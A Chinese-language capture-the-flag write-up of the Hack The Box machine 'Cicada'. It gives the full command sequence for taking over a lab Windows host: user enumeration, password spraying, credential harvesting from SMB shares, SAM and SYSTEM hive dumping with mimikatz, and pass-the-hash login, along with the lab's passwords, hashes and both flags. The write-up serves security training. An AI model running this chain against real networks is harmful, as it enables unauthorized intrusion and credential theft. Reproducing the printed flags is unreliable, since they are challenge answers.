HTB:Cicada[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行开放端口扫描

使用nmap对靶机开放端口进行脚本、服务信息扫描

首先尝试空密码连接靶机SMB服务

由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

通过该账户连接至靶机SMB服务器提取敏感信息

使用david.orelious用户凭证登录靶机SMB服务

使用evil-winrm通过上文凭证连接到靶机WinRM服务

USER_FLAG:0c79a06b429a6c9144e52201714e6328

权限提升

尝试将注册表中的SAM、SYSTEM进行读取保存

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005


连接至HTB服务器并启动靶机

靶机IP:10.10.11.35

分配IP:10.10.16.22


使用nmap对靶机进行开放端口扫描

nmap -p- --min-rate=1500 -sS -sU -Pn 10.10.11.35

将输出写入res.txt文件中,并提取端口号存入变量ports

ports=$(cat res.txt | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p$ports -sCV 10.10.11.35

首先尝试空密码连接靶机SMB服务

smbclient -L 10.10.11.35

列出HR共享中的所有文件

smbclient -N \\\\10.10.11.35\\HR

Notice from HR.txt文件下载到本地

get "Notice from HR.txt"

查看该文件内容

cat 'Notice from HR.txt'

密码:Cicada$M6Corpb*@Lp#nZp!8


由于不知道账户名,这里我们使用crackmapexec对smb服务进行用户爆破

crackmapexec smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep 'SidTypeUser'

将该输出保存到users.txt文件中,再将所有用户名进行提取

cat users.txt | cut -f 2 -d '\' | cut -f 1 -d ' ' | tee users.txt

使用上文拿到的密码对靶机账户进行密码喷洒

crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

由输出可见,该密码对账户michael.wrightson生效

账户:michael.wrightson

密码:Cicada$M6Corpb*@Lp#nZp!8


通过该账户连接至靶机SMB服务器提取敏感信息

crackmapexec smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

账户:david.orelious

密码:aRt$Lp#7t*VQ!3


使用david.orelious用户凭证登录靶机SMB服务

smbclient -U david.orelious //10.10.11.35/DEV

Backup_script.ps1文件下载到本地

get Backup_script.ps1

查看该文件内容

cat Backup_script.ps1

账户:emily.oscars

密码:Q!3@Lp#M6b*7t*Vt


使用evil-winrm通过上文凭证连接到靶机WinRM服务

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

进入C盘根目录

cd C:\

查找user_flag位置

cmd.exe /c dir /s user.txt

可以看到有两个user.txt文件,两个都查看内容发现是一样的

type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"
type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

*Evil-WinRM* PS C:\> type "C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

*Evil-WinRM* PS C:\> type "C:\Users\emily.oscars.CICADA\Desktop\user.txt"

0c79a06b429a6c9144e52201714e6328

USER_FLAG:0c79a06b429a6c9144e52201714e6328


权限提升

列出所有用户组

可以看到该用户具有文件备份特权(SeBackupPrivilege)

尝试将注册表中的SAM、SYSTEM进行读取保存

reg save hklm\sam sam
reg save hklm\system system

利用这两个注册表文件抓取靶机管理员密码

.\mimikatz.exe "lsadump::sam /sam:sam /system:system" exit

账户:Administrator

密码:2b87e7c93a3e8a0ea4a581937016f341

利用该哈希值直接通过evil-winrm登录靶机

evil-winrm -i 10.10.11.35 -H '2b87e7c93a3e8a0ea4a581937016f341' -u 'Administrator'

进入C盘根目录下

cd C:\

查找root_flag位置

cmd.exe /c dir /s root.txt

查看root_flag内容

type "C:\Users\Administrator\Desktop\root.txt"

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\

*Evil-WinRM* PS C:\> cmd.exe /c dir /s root.txt

Volume in drive C has no label.

Volume Serial Number is 1B60-8905

Directory of C:\Documents and Settings\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Directory of C:\Users\Administrator\Desktop

10/30/2024 04:30 PM 34 root.txt

1 File(s) 34 bytes

Total Files Listed:

2 File(s) 68 bytes

0 Dir(s) 1,663,627,264 bytes free

*Evil-WinRM* PS C:\> type "C:\Users\Administrator\Desktop\root.txt"

b7c206ec1a5f03f4de21e622502f4005

ROOT_FLAG:b7c206ec1a5f03f4de21e622502f4005

相关推荐
儒道易行19 分钟前
【Pikachu】Cross-Site Scripting跨站脚本攻击实战
网络安全
中云DDoS CC防护蔡蔡2 小时前
棋牌游戏防ddos攻击,高防IP好用吗?
运维·服务器·游戏·网络安全·ddos
乐茵安全2 小时前
windows基础
windows·安全·网络安全
假客套6 小时前
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
网络安全·xss·dvwa靶场·dvwa xss靶场·web渗透、
假客套6 小时前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
kuber090911 小时前
雷池社区版新版本功能防绕过人机验证解析
网络安全
溯Sec13 小时前
搜索引擎之shodan(一):初始化及安装
网络·安全·web安全·搜索引擎·网络安全·系统安全·安全架构